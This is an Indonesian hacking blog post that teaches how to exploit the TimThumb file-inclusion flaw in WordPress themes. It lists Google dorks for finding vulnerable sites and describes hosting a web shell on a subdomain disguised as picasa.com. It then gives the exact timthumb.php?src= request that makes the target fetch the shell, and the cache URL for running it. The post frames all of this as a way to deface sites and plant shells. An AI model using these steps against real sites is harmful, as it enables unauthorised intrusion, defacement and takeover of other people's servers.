Tim-thumb Exploit WordPress adalah teknik hacking yang dapat dilakukan dengan memanfaatkan bug pada Timthumb.php atau thumb.php.Okke Gk usah Banyak Bacod Langsung Join TKP =))
Bahan - Bahan :
- Modem
- PC
- Otak
- Subdomain picasa.com.webkamu.org
Langkah - Langkah :
1. Meluncur Ke google Gunakan Dork Berikut
inurl:/wp-content/themes/TheStyle/
inurl:/wp-content/themes/nool/
inurl:/wp-content/themes/PersonalPress/
inurl:/wp-content/themes/SimplePress/
inurl:/wp-content/themes/DeepFocus/
inurl:/wp-content/themes/DelicateNews/
inurl:/wp-content/themes/Bold/
inurl:/wp-content/themes/eStore/
inurl:/wp-content/themes/TheProfessional/
inurl:/wp-content/themes/OnTheGo/
inurl:/wp-content/themes/AskIt/
inurl:/wp-content/themes/Nova/
inurl:/wp-content/themes/eNews/
USE YOUR BRAIN =))
2. Setelah menemukan target coba tambahkan timthumb.php
~> http://site/wp-content/themes/eStore/timthumb.php
3.Buat Subdomain di cpanel kamu ato di hosting picasa.com.websitekamu.org disini saya tidak akan menjelaskan cara membuat subdomain pasti semua udh pada bisa xD
4.Setelah Membuat subdomain Uplod shell di subdomain tadi sehingga menjadi
~> picasa.com/websitekamu.org/shell.php
5.Setelah Selesai Semua Langsung Di eksekusi Web Tadi Dengan Cara
~> http://site/wp-content/themes/eStore/timthumb.php?src= picasa.com/websitekamu.org/shell.php
6.Jika Keluar Seperti Gambar Ini Berarti Succes
7.Langsung Saja Buka Shellnya dgn cara
~> http://site/wp-content/themes/eStore/cache/md5_tadi.php
~> http://site/wp-content/themes/eStore/cache/b3e7dbdafde738b6e31c1d0b7fb93948.php
Tags : Exploit timthumb.php,Deface Dengan Teknik timthumb.php,Tanam Shell Dengan timthumb.php
0 Comments